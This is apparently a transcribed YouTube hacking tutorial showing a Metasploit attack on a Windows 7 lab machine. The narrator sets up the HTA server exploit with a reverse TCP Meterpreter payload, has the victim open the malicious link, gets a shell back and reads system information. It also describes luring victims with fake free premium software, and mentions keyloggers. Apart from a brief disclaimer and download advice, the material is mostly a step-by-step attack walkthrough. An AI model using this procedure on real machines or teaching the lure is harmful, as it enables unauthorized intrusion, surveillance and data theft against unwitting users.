Hi guys, welcome back to another video of the hacking series. Today I'm gonna show you how you can hack your own Windows 7. Okay, and remember guys, whenever you're downloading something from the internet, please make sure it's coming from known sources and not unknown sources, because it could hackers, they hide tons and tons of malicious files online where they put it for free. For example, Spotify Premium for free, YouTube Premium for free, and all those temptation software for free, and when you download the files or the XEs and you execute it on your machine, and you get owned by them. So your whole computer gets owned by them. They can see everything that you do online. They can put keyloggers, and the list goes on and on. They can see your private data. So a little disclaimer before we head on. Remember that hacking is illegal, and what I'm going to show you right now is only for educational purpose. Please make sure to hack only yourself. You're in your own lab, and only hack if you have permission from the company. Okay, and without further ado, let's get started. So I'm already opened Kali Linux here on my machine. I'm gonna open the terminal, and let me just zoom in a little bit for you guys easier to see. And then I'm gonna type in here ifconfig. Okay, so with the IP address of the machine is needed actually, so we can connect back. I'm gonna launch MSF console. This is where we're gonna set up our exploit and our malicious link that we will send to the victim in order to create, in order to for him or her to click on it. Okay, MSF console is launched. Sorry about that. And type in with me use exploit Windows miss HTA server. Hit enter on that. We're now in the folder of Windows HTA server. We're gonna set the lhost, which is gonna be the IP address of the machine. You're gonna copy that and paste it. Hit enter on that. Gonna set the server host, which is gonna be the same as the IP address of the machine, 160.154. Hit enter on that, and moving from there, we're gonna set the payload of Windows / interpreter / reverse TCP, which is gonna help us connect back to our Metasploit. And lastly is the L port. The L port here is optional. You can choose whatever number you feel comfortable with, from 0 to 65,000. I'm gonna choose 9001 and hit enter. Alright, after that, what is left for us to do is exploit and hit enter. So as you can see from my screen, that we have already a session open because I have run it before. So what I will usually do is I will copy the link right here and then run it on my Windows, which is going to be the victim's machine, and head on to our Windows machine. Open the Internet Explorer and type in with me HTTP and the IP address 192.168.160.154 and the port 8080 D8 U, capital U, F, capital V, 88, W, capital O, H, 2 V, S, and P dot HTA. Okay, and let's connect to it. So it will ask us to download this file. You want to save it into your computer, or you want to write it directly? Save it and let it download. Let's save it in our desktop. We don't have to rename it. Okay, this is just to show you guys. But a lot of hackers, what they do is they're gonna trick you with some social engineering, where they will show you, you know, there's a free premium accounts, like for example, like I mentioned in the introduction, whether it's Spotify, whether it's, you know, Adobe softwares, and they're gonna put in this link and convince you to download this file from an unknown source, like I showed you here. So once the victim click here and execute it, we're gonna hit run. We will get a connection back in our system. So let me show you back in our Kali machine. As you can see, we have a hit right here, and we have 2 sessions running. I was running earlier session, but my recording got interrupted. So if I type in here sessions dash I will have 2 sessions. So we're gonna run with the second one since the first one was interrupted, and we're gonna choose number 2. Okay, so now I'm interacting with the system. Let's type in drop in a shell. Okay, I'm inside the Windows machine right now. So if I type in dir, there's nothing on the desktop except the file that we have saved in our desktop. If I go into type in here system info and let it load, it will give us the whole information about the Windows machine, and from here onwards the options, you know, are limitless. As you can see, all the information about the Windows machine 7, the build, you know, the user's name, everything is right here, and the IP address. So there you have it, guys. This is how you can compromise a machine, and from here onwards you can do a lot of things. You can set payloads, you can download, you can, you know, check the user's history, all the keyloggers, can put keyloggers as well, and the sky is the limit. So again, be careful whatever you download from the internet, make sure it's from a reliable source, and if you like the content that I'm doing, please leave a like, a comment, and subscribe, and I'll catch you in the next video. Peace out.